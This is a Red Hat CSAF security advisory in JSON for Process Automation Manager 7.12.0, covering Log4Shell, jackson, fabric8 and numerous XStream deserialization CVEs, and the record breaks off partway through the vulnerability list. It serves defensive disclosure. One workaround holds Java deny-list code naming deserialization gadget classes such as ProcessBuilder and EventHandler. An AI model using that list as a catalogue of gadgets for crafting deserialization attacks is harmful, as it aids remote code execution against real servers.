* xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData (CVE-2021-39152)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Process Automation Manager.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.12.0 serves as an update to Red Hat Process Automation Manager 7.11.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception (CVE-2020-28491)\n\n* kubernetes-client: fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise (CVE-2021-20218)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.* (CVE-2021-39149)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39145)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39151)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration (CVE-2021-39147)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator (CVE-2021-39148)\n\n* xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39141)\n\n* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39146)\n\n* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39154)\n\n* xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.* (CVE-2021-39144)\n\n* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39139)\n\n* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39153)\n\n* xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler (CVE-2021-39140)\n\n* xstream: remote command execution attack by manipulating the processed input stream (CVE-2021-29505)\n\n* xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39150)\n\n* xstream: Server-side request forgery (SSRF) via unsafe deserialization of jdk.nashorn.internal.runtime.Source$URLData (CVE-2021-39152)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:0296",
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "1923405",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"category": "external",
"summary": "1930423",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423"
},
{
"category": "external",
"summary": "1966735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1966735"
},
{
"category": "external",
"summary": "1997763",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997763"
},
{
"category": "external",
"summary": "1997765",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997765"
},
{
"category": "external",
"summary": "1997769",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997769"
},
{
"category": "external",
"summary": "1997772",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997772"
},
{
"category": "external",
"summary": "1997775",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997775"
},
{
"category": "external",
"summary": "1997777",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997777"
},
{
"category": "external",
"summary": "1997779",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997779"
},
{
"category": "external",
"summary": "1997781",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997781"
},
{
"category": "external",
"summary": "1997784",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997784"
},
{
"category": "external",
"summary": "1997786",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997786"
},
{
"category": "external",
"summary": "1997791",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997791"
},
{
"category": "external",
"summary": "1997793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997793"
},
{
"category": "external",
"summary": "1997795",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997795"
},
{
"category": "external",
"summary": "1997801",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997801"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0296.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Process Automation Manager 7.12.0 security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:36+00:00",
"generator": {
"date": "2024-12-12T01:18:36+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2022:0296",
"initial_release_date": "2022-01-26T15:52:53+00:00",
"revision_history": [
{
"date": "2022-01-26T15:52:53+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-01-26T15:52:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:36+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHPAM 7.12.0",
"product": {
"name": "RHPAM 7.12.0",
"product_id": "RHPAM 7.12.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7.12"
}
}
}
],
"category": "product_family",
"name": "Red Hat Process Automation Manager"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2020-28491",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-02-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1930423"
}
],
"notes": [
{
"category": "description",
"text": "This affects the package com.fasterxml.jackson.dataformat:jackson-dataformat-cbor from 0 and before 2.11.4, from 2.12.0-rc1 and before 2.12.1. Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform (OCP), the hive/presto/hadoop components that comprise the OCP metering stack, ship the vulnerable version of jackson-dataformat-cbor.\nSince the release of OCP 4.6, the metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.\n\nIn OCP 4.6 the openshift4/ose-logging-elasticsearch6 container delivers the vulnerable version of jackson-dataformat-cbor, but OCP 4.6 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities because it is now in the Maintenance Phase of the support, hence this component is marked as ooss. Since the release of OCP 4.7 this component is delivered as part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8 container).\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28491"
},
{
"category": "external",
"summary": "RHBZ#1930423",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1930423"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28491",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28491"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28491"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329",
"url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONDATAFORMAT-1047329"
}
],
"release_date": "2021-02-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception"
},
{
"acknowledgments": [
{
"names": [
"Ivan Bodrov"
]
},
{
"names": [
"Marc Nuri"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2021-20218",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2021-02-01T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1923405"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the fabric8 kubernetes-client in version 4.2.0 and after. This flaw allows a malicious pod/container to cause applications using the fabric8 kubernetes-client `copy` command to extract files outside the working path. The highest threat from this vulnerability is to integrity and system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Container Platform 4 (OCP) there are no plans to maintain the ose-logging-elasticsearch5 container, therefore it has been marked wontfix at this time and maybe fixed in a future update.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship fabric8-kubernetes-client and is therefore not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-20218"
},
{
"category": "external",
"summary": "RHBZ#1923405",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1923405"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-20218",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20218"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20218"
},
{
"category": "external",
"summary": "https://github.com/fabric8io/kubernetes-client/issues/2715",
"url": "https://github.com/fabric8io/kubernetes-client/issues/2715"
}
],
"release_date": "2021-01-12T04:35:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise"
},
{
"cve": "CVE-2021-29505",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-05-28T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1966735"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in XStream. By manipulating the processed input stream, a remote attacker may be able to obtain sufficient rights to execute commands. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: remote command execution attack by manipulating the processed input stream",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\n\nCodeReady Studio 12 ships a version of xstream that is affected by this flaw as a transitive dependency for the Wise framework plugin. However, the vulnerable code is not called, so this flaw has been marked as Low severity for CodeReady Studio 12.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-29505"
},
{
"category": "external",
"summary": "RHBZ#1966735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1966735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-29505",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-29505"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-29505",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29505"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc"
},
{
"category": "external",
"summary": "https://x-stream.github.io/CVE-2021-29505.html",
"url": "https://x-stream.github.io/CVE-2021-29505.html"
}
],
"release_date": "2021-05-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"category": "workaround",
"details": "Depending on the version of XStream used there are various usage patterns that mitigate this flaw, though we would strongly recommend using the allow list approach if at all possible as there are likely more class combinations the deny list approach may not address.\n\nAllow list approach\n```java\nXStream xstream = new XStream();\nXStream.setupDefaultSecurity(xstream);\nxstream.allowTypesByWildcard(new String[] {\"com.misc.classname\"})\n```\nDeny list for XStream 1.4.16 (this should also address some previous flaws found in 1.4.7 - \u003e 1.4.15) \n```java\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.Lazy(?:Search)?Enumeration.*\", \"(?:java|sun)\\\\.rmi\\\\..*\" });\n```\n\nDeny list for XStream 1.4.15\n```java\nxstream.denyTypes(new String[]{ \"sun.awt.datatransfer.DataTransferer$IndexOrderComparator\", \"sun.swing.SwingLazyValue\", \"com.sun.corba.se.impl.activation.ServerTableEntry\", \"com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$ServiceNameIterator\", \"javafx\\\\.collections\\\\.ObservableList\\\\$.*\", \".*\\\\.bcel\\\\..*\\\\.util\\\\.ClassLoader\" });\nxstream.denyTypeHierarchy(java.io.InputStream.class );\nxstream.denyTypeHierarchy(java.nio.channels.Channel.class );\nxstream.denyTypeHierarchy(javax.activation.DataSource.class );\nxstream.denyTypeHierarchy(javax.sql.rowset.BaseRowSet.class );\n```\n\nDeny list for XStream 1.4.13\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\n```\n\nDeny list for XStream 1.4.7 -\u003e 1.4.12\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\n```\n\nDeny list for versions prior to XStream 1.4.7\n```java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || Proxy.isProxy(type));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```",
"product_ids": [
"RHPAM 7.12.0"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "XStream: remote command execution attack by manipulating the processed input stream"
},
{
"cve": "CVE-2021-39139",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997763"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.\n\nOpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, the OCP Jenkins package is not affected by this flaw.\nThis version of the XStream library will be delivered in future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39139"
},
{
"category": "external",
"summary": "RHBZ#1997763",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997763"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39139",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39139"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39139",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39139"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-64xx-cq4q-mf44",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-64xx-cq4q-mf44"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl"
},
{
"cve": "CVE-2021-39140",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997765"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream\u0027s security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers Jenkins LTS package with bundled XStream library. Due to JEP-200 [1] and JEP-228 [2] Jenkins projects, OCP Jenkins package is not affected by this flaw.\nThis version of XStream library will be delivered in the future Jenkins releases.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://github.com/jenkinsci/jep/blob/master/jep/228/README.adoc#security",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39140"
},
{
"category": "external",
"summary": "RHBZ#1997765",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997765"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39140",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39140"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39140",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39140"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-6wf9-jmg9-vxcc",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-6wf9-jmg9-vxcc"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.12.0"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.12.0"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler"
},
{
"cve": "CVE-2021-39141",
"cwe": {
"id": "CWE-434",
"name": "Unrestricted Upload of File with Dangerous Type"
},
"discovery_date": "2021-08-23T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1997769"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream, a simple library used to serialize objects to XML and back again. This flaw allows a remote attacker to load and execute arbitrary code from a remote host by manipulating the processed input stream. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.*",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Users who follow the recommended security framework with a whitelist to limit the types to the minimum required should not be affected. XStream 1.4.18 no longer uses a blacklist by default since it cannot be secured for general purposes.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.12.0"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-39141"
},
{
"category": "external",
"summary": "RHBZ#1997769",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1997769"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-39141",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-39141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39141"
},
{
"category": "external",
"summary": "https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2",
"url": "https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2"
}
],
"release_date": "2021-08-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-26T15:52:53+00:00",
